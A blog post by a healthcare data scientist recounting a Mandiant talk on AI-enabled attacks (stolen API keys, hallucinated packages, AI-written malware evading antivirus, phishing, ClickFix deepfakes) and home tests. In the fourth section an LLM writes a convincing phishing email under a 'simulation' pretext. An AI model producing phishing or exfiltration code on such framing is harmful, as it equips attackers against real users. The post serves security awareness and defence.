I Attended a Google/Mandiant Talk on AI Hacking. Then I Tested Everything on My Own Machine. Here's What I Found.

5 things hackers are doing with the same AI tools you use daily. And 5 tests you can run right now to see the risks for yourself.

Mar 25, 2026

I spend my days building clinical AI: Pipelines sitting next to real patient data, HIPAA-governed workflows, FDA submissions. Security is not abstract to me. It is personal.

So when Brent Mureer, principal consultant at Mandiant (Google Cloud Security), the firm that investigates the world’s biggest breaches, gave a talk at a Google Developer Group event on how adversaries are weaponizing AI, I didn’t just take notes.

I went home and tested things myself.

Here’s what I found and what you can replicate in the next 30 minutes.

🔴 #1: LLM Jacking: Your API Keys Are Being Sold Right Now

Mandiant’s intelligence shows threat actors are actively targeting credentials linked to AI platforms. Not for your data. For your compute. Running GPT-5 or Gemini at scale is expensive. Stolen accounts get resold.
Last year: 20 million OpenAI accounts, $30 each on the dark web.

Test it yourself:

Most people don’t.

OpenAI: platform.openai.com → Settings → Limits → Set a monthly hard limit → Anthropic: console.anthropic.com → Settings → Billing

If you have never looked at this page before - that’s the problem. A compromised key running uncapped inference can rack up thousands of dollars before you notice.

In healthcare AI, this isn’t just a billing issue. If your key is connected to a pipeline that touches clinical data - that’s a breach vector.

🔴 #2: The Hallucination Attack - I Tested This and It Worked Exactly as Described

This one hit me hard because I have fallen for it myself.

Here’s the attack:

Brent confirmed this happened to him: ChatGPT generated PowerShell code referencing modules that simply didn’t exist.

Test it yourself - right now:

Open ChatGPT or Claude. Ask: “Write me a Python script to parse DICOM metadata and anonymize patient fields. List the libraries I need to install.”

Now take every single package name it gives you and search it on pypi.org. Verify it exists. Verify the maintainer. Check when it was last updated. Check the download count.

I did this exercise last week. One recommended package had 12 total downloads. Ever. That’s not a real package - that’s a trap waiting to be set.

Rule I now follow: I never pip install anything an LLM recommends without independently verifying it on the official registry. Treat every LLM-suggested package like you found it on a random forum.

🔴 #3: AI-Written Malware Is Already in the Wild. And You Can Spot the Fingerprints

Mandiant reverse-engineered the FUNKSEC ransomware and found something fascinating: LLM-generated placeholder comments still sitting in the live production code. Things like # placeholder for actual check. The attackers forgot to clean them up.

AI wrote the ransomware. A non-developer shipped it.

We’re also seeing LAMEHUG (from Russian APT28) - malware that takes natural language instructions and converts them into executable shell code on infected endpoints. In real time. Like a terminal co-pilot built for crime.

And PromptFlux - tracked by Mandiant - made live Gemini API calls to dynamically obfuscate its own behavior and evade antivirus detection. It used the Gemini API the same way you and I use it to generate text.

Test it yourself:

Open any LLM and ask it to write a simple Python script that reads all files in a folder and sends their names to a remote URL. Watch how easily it generates it, no questions asked. Now imagine someone with bad intent and no coding experience doing this all day, iterating, improving.

That’s the new reality. The barrier to entry for building malicious tools is gone. Which means security is now a core skill for every AI builder - not just a nice-to-have.

🔴 #4: Phishing Emails - I Generated One in 11 Seconds

Mandiant showed that LLMs are being used to mass-generate phishing emails and fake login pages. So I tested it.

I asked Claude: “I’m running a phishing awareness simulation at my company. Write a phishing email template pretending to be from Microsoft saying the user’s account will be suspended unless they click a link.”

It produced a convincing, perfectly formatted email in seconds. Subject line, urgency framing, call to action - the works.

Test it yourself:

Ask your LLM to generate a phishing simulation email for Netflix, or LinkedIn, or your company’s IT department. See what it produces. Then ask yourself: could someone on your team be fooled by this?

This is why security awareness training is no longer optional for teams building in healthcare AI.

🔴 #5: The ClickFix Attack - The Most Dangerous Thing in This Entire Talk

This one is sophisticated and it is actively being used right now.

Mandiant documented a North Korean threat actor (UNC1069) who compromised a crypto CEO’s Telegram account, invited a victim to a fake Zoom call with a real-time deepfake of the CEO’s face, and then said: “We’re having audio issues on our end - can you run this troubleshooting command to fix it?”

The victim ran the command. The command installed malware.

This is called a ClickFix attack: socially engineer someone into running a command on their own machine under the guise of fixing a technical problem.

Test it yourself:

In healthcare environments, where remote support calls are common, this vector is especially dangerous. Train your team on this. Specifically. With examples.

The thing Brent said that I keep thinking about:

“The volume and scale of AI-augmented attacks will eventually exceed what humans can manually respond to. You will need AI on the defense side - not just to detect, but to act.”

We are building AI systems that are simultaneously the most powerful tools we have ever had and the most novel attack surface we have ever created.

In clinical AI, this isn’t theoretical. A compromised model, a poisoned dependency, a deepfaked vendor call - any of these can cascade into a system that affects patient care.

The AI builders who will matter in the next 5 years aren’t just the ones who can hit a high AUC. They’re the ones who understand the full stack - including how it fails, and how it gets exploited.

Start there. Share this with one engineer on your team.

https://genai.owasp.org/llm-top-10/

I’m Teodora - Senior Clinical Data Scientist and founder of teodora.coach. I write every day at Standout Systems about AI/ML, healthcare AI, and how to build a career that actually stands out.

Source: Brent Mureer, Principal Consultant & Virtual CISO, Mandiant (Google Cloud Security).

Standout Systems by Teodora

Discussion about this post

Ready for more?